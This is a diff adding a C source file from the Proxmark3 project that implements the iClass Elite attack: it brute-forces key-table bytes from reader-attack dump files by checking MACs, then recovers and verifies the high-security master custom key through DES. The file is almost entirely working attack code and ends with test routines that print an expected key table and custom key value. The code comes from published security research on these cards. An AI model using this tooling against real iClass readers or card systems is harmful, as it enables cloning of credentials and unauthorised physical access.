--- /dev/null
+#include <stdint.h>
+#include <stdbool.h>
+#include <string.h>
+#include <stdio.h>
+#include <time.h>
+#include "cipherutils.h"
+#include "cipher.h"
+#include "ikeys.h"
+#include "elite_crack.h"
+#include "fileutils.h"
+#include "des.h"
+
+/**
+ * @brief Permutes a key from standard NIST format to Iclass specific format
+ * from http://www.proxmark.org/forum/viewtopic.php?pid=11220#p11220
+ *
+ * If you permute [6c 8d 44 f9 2a 2d 01 bf] you get [8a 0d b9 88 bb a7 90 ea] as shown below.
+ *
+ * 1 0 1 1 1 1 1 1 bf
+ * 0 0 0 0 0 0 0 1 01
+ * 0 0 1 0 1 1 0 1 2d
+ * 0 0 1 0 1 0 1 0 2a
+ * 1 1 1 1 1 0 0 1 f9
+ * 0 1 0 0 0 1 0 0 44
+ * 1 0 0 0 1 1 0 1 8d
+ * 0 1 1 0 1 1 0 0 6c
+ *
+ * 8 0 b 8 b a 9 e
+ * a d 9 8 b 7 0 a
+ *
+ * @param key
+ * @param dest
+ */
+void permutekey(uint8_t key[8], uint8_t dest[8])
+{
+
+ int i;
+ for(i = 0 ; i < 8 ; i++)
+ {
+ dest[i] = (((key[7] & (0x80 >> i)) >> (7-i)) << 7) |
+ (((key[6] & (0x80 >> i)) >> (7-i)) << 6) |
+ (((key[5] & (0x80 >> i)) >> (7-i)) << 5) |
+ (((key[4] & (0x80 >> i)) >> (7-i)) << 4) |
+ (((key[3] & (0x80 >> i)) >> (7-i)) << 3) |
+ (((key[2] & (0x80 >> i)) >> (7-i)) << 2) |
+ (((key[1] & (0x80 >> i)) >> (7-i)) << 1) |
+ (((key[0] & (0x80 >> i)) >> (7-i)) << 0);
+ }
+
+ return;
+}
+/**
+ * Permutes a key from iclass specific format to NIST format
+ * @brief permutekey_rev
+ * @param key
+ * @param dest
+ */
+void permutekey_rev(uint8_t key[8], uint8_t dest[8])
+{
+ int i;
+ for(i = 0 ; i < 8 ; i++)
+ {
+ dest[7-i] = (((key[0] & (0x80 >> i)) >> (7-i)) << 7) |
+ (((key[1] & (0x80 >> i)) >> (7-i)) << 6) |
+ (((key[2] & (0x80 >> i)) >> (7-i)) << 5) |
+ (((key[3] & (0x80 >> i)) >> (7-i)) << 4) |
+ (((key[4] & (0x80 >> i)) >> (7-i)) << 3) |
+ (((key[5] & (0x80 >> i)) >> (7-i)) << 2) |
+ (((key[6] & (0x80 >> i)) >> (7-i)) << 1) |
+ (((key[7] & (0x80 >> i)) >> (7-i)) << 0);
+ }
+}
+
+/**
+ * Helper function for hash1
+ * @brief rr
+ * @param val
+ * @return
+ */
+uint8_t rr(uint8_t val)
+{
+ return val >> 1 | (( val & 1) << 7);
+}
+/**
+ * Helper function for hash1
+ * @brief rl
+ * @param val
+ * @return
+ */
+uint8_t rl(uint8_t val)
+{
+ return val << 1 | (( val & 0x80) >> 7);
+}
+/**
+ * Helper function for hash1
+ * @brief swap
+ * @param val
+ * @return
+ */
+uint8_t swap(uint8_t val)
+{
+ return ((val >> 4) & 0xFF) | ((val &0xFF) << 4);
+}
+
+/**
+ * Hash1 takes CSN as input, and determines what bytes in the keytable will be used
+ * when constructing the K_sel.
+ * @param csn the CSN used
+ * @param k output
+ */
+void hash1(uint8_t csn[] , uint8_t k[])
+{
+ k[0] = csn[0]^csn[1]^csn[2]^csn[3]^csn[4]^csn[5]^csn[6]^csn[7];
+ k[1] = csn[0]+csn[1]+csn[2]+csn[3]+csn[4]+csn[5]+csn[6]+csn[7];
+ k[2] = rr(swap( csn[2]+k[1] ));
+ k[3] = rr(swap( csn[3]+k[0] ));
+ k[4] = ~rr(swap( csn[4]+k[2] ))+1;
+ k[5] = ~rr(swap( csn[5]+k[3] ))+1;
+ k[6] = rr( csn[6]+(k[4]^0x3c) );
+ k[7] = rl( csn[7]+(k[5]^0xc3) );
+ int i;
+ for(i = 7; i >=0; i--)
+ k[i] = k[i] & 0x7F;
+}
+
+
+/**
+ * @brief Reads data from the iclass-reader-attack dump file.
+ * @param dump, data from a iclass reader attack dump. The format of the dumpdata is expected to be as follows:
+ * <8 byte CSN><8 byte CC><4 byte NR><4 byte MAC><8 byte HASH1><1 byte NUM_BYTES_TO_RECOVER><3 bytes BYTES_TO_RECOVER>
+ * .. N times...
+ *
+ * So the first attack, with 3 bytes to recover would be : ... 03000145
+ * And a later attack, with 1 byte to recover (byte 0x5)would be : ...01050000
+ * And an attack, with 2 bytes to recover (byte 0x5 and byte 0x07 )would be : ...02050700
+ *
+ * @param cc_nr an array to store cc_nr into (12 bytes)
+ * @param csn an arracy ot store CSN into (8 bytes)
+ * @param received_mac an array to store MAC into (4 bytes)
+ * @param i the number to read. Should be less than 127, or something is wrong...
+ * @return
+ */
+int _readFromDump(uint8_t dump[], dumpdata* item, uint8_t i)
+{
+ size_t itemsize = sizeof(dumpdata);
+ //dumpdata item = {0};
+ memcpy(item,dump+i*itemsize, itemsize);
+ if(true)
+ {
+ printvar("csn", item->csn,8);
+ printvar("cc_nr", item->cc_nr,12);
+ printvar("mac", item->mac,4);
+ }
+ return 0;
+}
+
+static uint32_t startvalue = 0;
+/**
+ * @brief Performs brute force attack against a dump-data item, containing csn, cc_nr and mac.
+ *This method calculates the hash1 for the CSN, and determines what bytes need to be bruteforced
+ *on the fly. If it finds that more than three bytes need to be bruteforced, it aborts.
+ *It updates the keytable with the findings, also using the upper half of the 16-bit ints
+ *to signal if the particular byte has been cracked or not.
+ *
+ * @param dump The dumpdata from iclass reader attack.
+ * @param keytable where to write found values.
+ * @return
+ */
+int bruteforceItem(dumpdata item, uint16_t keytable[])
+{
+ int errors = 0;
+ uint8_t key_sel_p[8] = { 0 };
+ uint8_t div_key[8] = {0};
+ int found = false;
+ uint8_t key_sel[8] = {0};
+ uint8_t calculated_MAC[4] = { 0 };
+
+ //Get the key index (hash1)
+ uint8_t key_index[8] = {0};
+ hash1(item.csn, key_index);
+
+
+ /*
+ * Determine which bytes to retrieve. A hash is typically
+ * 01010000454501
+ * We go through that hash, and in the corresponding keytable, we put markers
+ * on what state that particular index is:
+ * - CRACKED (this has already been cracked)
+ * - BEING_CRACKED (this is being bruteforced now)
+ * - CRACK_FAILED (self-explaining...)
+ *
+ * The markers are placed in the high area of the 16 bit key-table.
+ * Only the lower eight bits correspond to the (hopefully cracked) key-value.
+ **/
+ uint8_t bytes_to_recover[3] = {0};
+ uint8_t numbytes_to_recover = 0 ;
+ int i;
+ for(i =0 ; i < 8 ; i++)
+ {
+ if(keytable[key_index[i]] & (CRACKED | BEING_CRACKED)) continue;
+ bytes_to_recover[numbytes_to_recover++] = key_index[i];
+ keytable[key_index[i]] |= BEING_CRACKED;
+
+ if(numbytes_to_recover > 3)
+ {
+ prnlog("The CSN requires > 3 byte bruteforce, not supported");
+ printvar("CSN", item.csn,8);
+ printvar("HASH1", key_index,8);
+
+ //Before we exit, reset the 'BEING_CRACKED' to zero
+ keytable[bytes_to_recover[0]] &= ~BEING_CRACKED;
+ keytable[bytes_to_recover[1]] &= ~BEING_CRACKED;
+ keytable[bytes_to_recover[2]] &= ~BEING_CRACKED;
+
+ return 1;
+ }
+ }
+
+ /*
+ *A uint32 has room for 4 bytes, we'll only need 24 of those bits to bruteforce up to three bytes,
+ */
+ uint32_t brute = startvalue;
+ /*
+ Determine where to stop the bruteforce. A 1-byte attack stops after 256 tries,
+ (when brute reaches 0x100). And so on...
+ bytes_to_recover = 1 --> endmask = 0x0000100
+ bytes_to_recover = 2 --> endmask = 0x0010000
+ bytes_to_recover = 3 --> endmask = 0x1000000
+ */
+
+ uint32_t endmask = 1 << 8*numbytes_to_recover;
+
+ for(i =0 ; i < numbytes_to_recover && numbytes_to_recover > 1; i++)
+ prnlog("Bruteforcing byte %d", bytes_to_recover[i]);
+
+ while(!found && !(brute & endmask))
+ {
+
+ //Update the keytable with the brute-values
+ for(i =0 ; i < numbytes_to_recover; i++)
+ {
+ keytable[bytes_to_recover[i]] &= 0xFF00;
+ keytable[bytes_to_recover[i]] |= (brute >> (i*8) & 0xFF);
+ }
+
+ // Piece together the key
+ key_sel[0] = keytable[key_index[0]] & 0xFF;key_sel[1] = keytable[key_index[1]] & 0xFF;
+ key_sel[2] = keytable[key_index[2]] & 0xFF;key_sel[3] = keytable[key_index[3]] & 0xFF;
+ key_sel[4] = keytable[key_index[4]] & 0xFF;key_sel[5] = keytable[key_index[5]] & 0xFF;
+ key_sel[6] = keytable[key_index[6]] & 0xFF;key_sel[7] = keytable[key_index[7]] & 0xFF;
+
+ //Permute from iclass format to standard format
+ permutekey_rev(key_sel,key_sel_p);
+ //Diversify
+ diversifyKey(item.csn, key_sel_p, div_key);
+ //Calc mac
+ doMAC(item.cc_nr, div_key,calculated_MAC);
+
+ if(memcmp(calculated_MAC, item.mac, 4) == 0)
+ {
+ for(i =0 ; i < numbytes_to_recover; i++)
+ prnlog("=> %d: 0x%02x", bytes_to_recover[i],0xFF & keytable[bytes_to_recover[i]]);
+ found = true;
+ break;
+ }
+ brute++;
+ if((brute & 0xFFFF) == 0)
+ {
+ printf("%d",(brute >> 16) & 0xFF);
+ fflush(stdout);
+ }
+ }
+ if(! found)
+ {
+ prnlog("Failed to recover %d bytes using the following CSN",numbytes_to_recover);
+ printvar("CSN",item.csn,8);
+ errors++;
+ //Before we exit, reset the 'BEING_CRACKED' to zero
+ for(i =0 ; i < numbytes_to_recover; i++)
+ {
+ keytable[bytes_to_recover[i]] &= 0xFF;
+ keytable[bytes_to_recover[i]] |= CRACK_FAILED;
+ }
+
+ }else
+ {
+ for(i =0 ; i < numbytes_to_recover; i++)
+ {
+ keytable[bytes_to_recover[i]] &= 0xFF;
+ keytable[bytes_to_recover[i]] |= CRACKED;
+ }
+
+ }
+ return errors;
+}
+
+
+/**
+ * From dismantling iclass-paper:
+ * Assume that an adversary somehow learns the first 16 bytes of hash2(K_cus ), i.e., y [0] and z [0] .
+ * Then he can simply recover the master custom key K_cus by computing
+ * K_cus = ~DES(z[0] , y[0] ) .
+ *
+ * Furthermore, the adversary is able to verify that he has the correct K cus by
+ * checking whether z [0] = DES enc (K_cus , ~K_cus ).
+ * @param keytable an array (128 bytes) of hash2(kcus)
+ * @param master_key where to put the master key
+ * @return 0 for ok, 1 for failz
+ */
+int calculateMasterKey(uint8_t first16bytes[], uint64_t master_key[] )
+{
+ des_context ctx_e = {DES_ENCRYPT,{0}};
+
+ uint8_t z_0[8] = {0};
+ uint8_t y_0[8] = {0};
+ uint8_t z_0_rev[8] = {0};
+ uint8_t key64[8] = {0};
+ uint8_t key64_negated[8] = {0};
+ uint8_t result[8] = {0};
+
+ // y_0 and z_0 are the first 16 bytes of the keytable
+ memcpy(y_0,first16bytes,8);
+ memcpy(z_0,first16bytes+8,8);
+
+ // Our DES-implementation uses the standard NIST
+ // format for keys, thus must translate from iclass
+ // format to NIST-format
+ permutekey_rev(z_0, z_0_rev);
+
+ // ~K_cus = DESenc(z[0], y[0])
+ des_setkey_enc( &ctx_e, z_0_rev );
+ des_crypt_ecb(&ctx_e, y_0, key64_negated);
+
+ int i;
+ for(i = 0; i < 8 ; i++)
+ {
+ key64[i] = ~key64_negated[i];
+ }
+
+ // Can we verify that the key is correct?
+ // Once again, key is on iclass-format
+ uint8_t key64_stdformat[8] = {0};
+ permutekey_rev(key64, key64_stdformat);
+
+ des_setkey_enc( &ctx_e, key64_stdformat );
+ des_crypt_ecb(&ctx_e, key64_negated, result);
+ prnlog("\nHigh security custom key (Kcus):");
+ printvar("Std format ", key64_stdformat,8);
+ printvar("Iclass format", key64,8);
+
+ if(master_key != NULL)
+ memcpy(master_key, key64, 8);
+
+ if(memcmp(z_0,result,4) != 0)
+ {
+ prnlog("Failed to verify calculated master key (k_cus)! Something is wrong.");
+ return 1;
+ }else{
+ prnlog("Key verified ok!\n");
+ }
+ return 0;
+}
+/**
+ * @brief Same as bruteforcefile, but uses a an array of dumpdata instead
+ * @param dump
+ * @param dumpsize
+ * @param keytable
+ * @return
+ */
+int bruteforceDump(uint8_t dump[], size_t dumpsize, uint16_t keytable[])
+{
+ uint8_t i;
+ int errors = 0;
+ size_t itemsize = sizeof(dumpdata);
+ clock_t t1 = clock();
+
+ dumpdata* attack = (dumpdata* ) malloc(itemsize);
+
+ for(i = 0 ; i * itemsize < dumpsize ; i++ )
+ {
+ memcpy(attack,dump+i*itemsize, itemsize);
+ errors += bruteforceItem(*attack, keytable);
+ }
+ free(attack);
+ clock_t t2 = clock();
+ float diff = (((float)t2 - (float)t1) / CLOCKS_PER_SEC );
+ prnlog("\nPerformed full crack in %f seconds",diff);
+
+ // Pick out the first 16 bytes of the keytable.
+ // The keytable is now in 16-bit ints, where the upper 8 bits
+ // indicate crack-status. Those must be discarded for the
+ // master key calculation
+ uint8_t first16bytes[16] = {0};
+
+ for(i = 0 ; i < 16 ; i++)
+ {
+ first16bytes[i] = keytable[i] & 0xFF;
+ if(!(keytable[i] & CRACKED))
+ {
+ prnlog("Error, we are missing byte %d, custom key calculation will fail...", i);
+ }
+ }
+ errors += calculateMasterKey(first16bytes, NULL);
+ return errors;
+}
+/**
+ * Perform a bruteforce against a file which has been saved by pm3
+ *
+ * @brief bruteforceFile
+ * @param filename
+ * @return
+ */
+int bruteforceFile(const char *filename, uint16_t keytable[])
+{
+
+ FILE *f = fopen(filename, "rb");
+ if(!f) {
+ prnlog("Failed to read from file '%s'", filename);
+ return 1;
+ }
+
+ fseek(f, 0, SEEK_END);
+ long fsize = ftell(f);
+ fseek(f, 0, SEEK_SET);
+
+ uint8_t *dump = malloc(fsize);
+ size_t bytes_read = fread(dump, fsize, 1, f);
+
+ fclose(f);
+ if (bytes_read < fsize)
+ {
+ prnlog("Error, could only read %d bytes (should be %d)",bytes_read, fsize );
+ }
+ return bruteforceDump(dump,fsize,keytable);
+}
+/**
+ *
+ * @brief Same as above, if you don't care about the returned keytable (results only printed on screen)
+ * @param filename
+ * @return
+ */
+int bruteforceFileNoKeys(const char *filename)
+{
+ uint16_t keytable[128] = {0};
+ return bruteforceFile(filename, keytable);
+}
+
+// ---------------------------------------------------------------------------------
+// ALL CODE BELOW THIS LINE IS PURELY TESTING
+// ---------------------------------------------------------------------------------
+// ----------------------------------------------------------------------------
+// TEST CODE BELOW
+// ----------------------------------------------------------------------------
+
+int _testBruteforce()
+{
+ int errors = 0;
+ if(true){
+ // First test
+ prnlog("[+] Testing crack from dumpfile...");
+
+ /**
+ Expected values for the dumpfile:
+ High Security Key Table
+
+ 00 F1 35 59 A1 0D 5A 26 7F 18 60 0B 96 8A C0 25 C1
+ 10 BF A1 3B B0 FF 85 28 75 F2 1F C6 8F 0E 74 8F 21
+ 20 14 7A 55 16 C8 A9 7D B3 13 0C 5D C9 31 8D A9 B2
+ 30 A3 56 83 0F 55 7E DE 45 71 21 D2 6D C1 57 1C 9C
+ 40 78 2F 64 51 42 7B 64 30 FA 26 51 76 D3 E0 FB B6
+ 50 31 9F BF 2F 7E 4F 94 B4 BD 4F 75 91 E3 1B EB 42
+ 60 3F 88 6F B8 6C 2C 93 0D 69 2C D5 20 3C C1 61 95
+ 70 43 08 A0 2F FE B3 26 D7 98 0B 34 7B 47 70 A0 AB
+
+ **** The 64-bit HS Custom Key Value = 5B7C62C491C11B39 ****
+ **/
+ uint16_t keytable[128] = {0};
+ //save some time...
+ startvalue = 0x7B0000;
+ errors |= bruteforceFile("iclass_dump.bin",keytable);
+ }
+ return errors;
+}
+
+int _test_iclass_key_permutation()
+{
+ uint8_t testcase[8] = {0x6c,0x8d,0x44,0xf9,0x2a,0x2d,0x01,0xbf};
+ uint8_t testcase_output[8] = {0};
+ uint8_t testcase_output_correct[8] = {0x8a,0x0d,0xb9,0x88,0xbb,0xa7,0x90,0xea};
+ uint8_t testcase_output_rev[8] = {0};
+ permutekey(testcase, testcase_output);
+ permutekey_rev(testcase_output, testcase_output_rev);
+
+
+ if(memcmp(testcase_output, testcase_output_correct,8) != 0)
+ {
+ prnlog("Error with iclass key permute!");
+ printarr("testcase_output", testcase_output, 8);
+ printarr("testcase_output_correct", testcase_output_correct, 8);
+ return 1;
+
+ }
+ if(memcmp(testcase, testcase_output_rev, 8) != 0)
+ {
+ prnlog("Error with reverse iclass key permute");
+ printarr("testcase", testcase, 8);
+ printarr("testcase_output_rev", testcase_output_rev, 8);
+ return 1;
+ }
+
+ prnlog("[+] Iclass key permutation OK!");
+ return 0;
+}
+
+int testElite()
+{
+ prnlog("[+] Testing iClass Elite functinality...");
+ prnlog("[+] Testing key diversification ...");
+
+ int errors = 0 ;
+ errors +=_test_iclass_key_permutation();
+ errors += _testBruteforce();
+ return errors;
+
+}
+
projects / proxmark3-svn / blobdiff